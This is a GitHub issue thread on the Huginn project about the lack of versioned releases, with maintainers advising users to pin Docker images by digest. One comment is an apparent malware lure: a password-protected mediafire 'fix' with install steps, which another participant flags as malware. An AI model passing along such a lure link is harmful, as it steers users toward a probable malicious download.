### ISSUE TITLE
Release plans

### ISSUE THREAD

**Issue by thomai** [huginn/huginn#3439]
Are there any plans to release a new version? The last release seems to be 2 years ago.

However, it seems development still goes on, right?

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by thomai** [comment]
@cantino I guess the last comment contains malware. Could you delete or report it?

**Comment by virtadpt** [comment]
@thomai Development still continues.  Everybody pretty much just runs the latest commit of Huginn.

**Comment by thomai** [comment]
I would prefer to refer specific versions in my Compose-Files instead of using “latest”. It would be nice to have releases with defined changes.

**Comment by thomai** [comment]
@virtadpt Any news on this? Based on the upvotes, I assume I am not the only one who is interested in consistent release tags :smiley:
Main reason for me is that I'd like to implement a clear backup/restore strategy by specifying particular version tags in compose files.

**Comment by virtadpt** [comment]
@thomai No news that I'm aware of.

**Comment by thomai** [comment]
I thought your last comment reflected the overall project strategy - maybe a misunderstanding. @knu Could you release newer versions including Docker tags?

**Comment by jswetzen** [comment]
@thomai You probably figured out by now, but if the release strategy is going to be "run master" I suggest using the digest from the `latest` tag and update that whenever you feel the need. Tags are just a name for a digest, right? 🤷‍♂️

**Comment by knu** [comment]
There is currently no release plan, roadmap, or milestones in the Huginn development, so versions we can tag would be sequential numbers or timestamps like `vYYYY.MM.DD`, which I don't think is meaningful.
If you want to pin a version, use a sha256 digest.

**Comment by thomai** [comment]
My request was not about the necessity of Docker tags specifically but about a version system to have full transparency about tested/released/stable versions. Of course, one could just use a particular digest - however I could never be sure about the stability of a revision.

**Comment by knu** [comment]
Me neither.  We don't have a QA team or process that assures us that every release is safe for everyone.

When I prepare a relatively large amount of changes, I usually run my instance with them for a certain period of time to see if Huginn does not get broken before I merge them, and that's all I do.  There are many features/agents that I don't use and can't test, so I can never be absolutely sure.

A safe bet would probably be to always use a version that's weeks old rather than eagerly testing the bleeding edge version to help us find and fix problems if any.

**Comment by thomai** [comment]
Thanks for your response. However, we decided to choose another option as we want to rely on clearly tested released revisions instead of potentially non-tested dev snapshots. We need to provide a stable environment for our users and we cannot guarantee this in my understanding. Nevertheless, thanks for the discussion.

**Comment by 0xdevalias** [comment]
@thomai Curious what the alternative solution you ended up choosing to use was, if you're open to sharing?
